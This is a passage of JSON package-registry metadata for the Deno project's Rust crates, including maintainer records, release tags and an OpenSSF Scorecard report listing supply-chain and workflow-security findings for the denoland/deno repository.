o/packages/deno_core/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:23.282Z","updated_at":"2022-11-07T18:29:23.282Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"96431","login":"littledivy","name":"Divy Srivastava","email":null,"url":"https://github.com/littledivy","packages_count":37,"html_url":"https://crates.io/users/littledivy","role":null,"created_at":"2026-02-23T17:36:20.897Z","updated_at":"2026-02-23T17:36:20.897Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/littledivy/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.865Z","updated_at":"2023-07-18T22:41:23.865Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5858434,"name":"libpacstall-rs","ecosystem":"cargo","description":"Backend API library for Pacstall","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","pacstall","apt","aur"],"namespace":null,"versions_count":1,"first_release_published_at":"2023-01-11T08:23:22.391Z","latest_release_published_at":"2023-01-11T08:23:22.391Z","latest_release_number":"2.0.0","last_synced_at":"2026-08-29T21:57:26.985Z","created_at":"2023-01-11T08:26:40.988Z","updated_at":"2026-08-30T10:02:25.308Z","registry_url":"https://crates.io/crates/libpacstall-rs/","install_command":"cargo install libpacstall-rs","documentation_url":"https://docs.rs/libpacstall-rs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/host